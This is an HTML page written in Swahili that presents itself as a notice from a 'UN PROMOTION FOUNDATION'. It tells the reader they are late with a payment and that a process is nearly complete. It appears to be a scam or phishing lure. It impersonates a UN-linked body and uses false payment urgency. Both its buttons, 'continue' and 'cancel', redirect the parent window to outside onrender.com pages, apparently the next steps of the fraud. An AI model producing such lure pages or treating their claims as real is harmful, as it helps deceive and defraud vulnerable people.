<!DOCTYPE html>
<html lang="sw">

<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>UN PROMOTION FOUNDATION - Taarifa Muhimu</title>
    <style>
        body {
            font-family: Arial, sans-serif;
            text-align: center;
            margin: 0;
            padding: 0;
            background-color: #f5f5f5;
        }

        h1 {
            margin-bottom: 20px;
            color: #333;
        }

        p {
            font-size: 1.2em;
            line-height: 1.5;
            color: #666;
        }

        button {
            padding: 10px 20px;
            font-size: 1em;
            border: none;
            background-color: #007bff;
            color: #fff;
            cursor: pointer;
            transition: background-color 0.3s;
        }

        button:hover {
            background-color: #0056b3;
        }
    </style>
</head>

<body>
    <h1>Mpendwa,</h1>
    <h1>Umechelewa kulipa na tunakaribia kukamilisha mchakato huu, jibu kwa fadhili:</h1>
    <button onclick="redirect()">Ili kuendelea</button><br><br>
    <button onclick="unredirect()">Kughairi mchakato wote</button><br><br>

   <script>
    function redirect(){
    window.parent.location.href = "https://page11.onrender.com/";
    }
    </script>
      <script>
    function unredirect(){
    window.parent.location.href = "https://homepage-l9av.onrender.com/";
    }
    </script>
</body>

</html>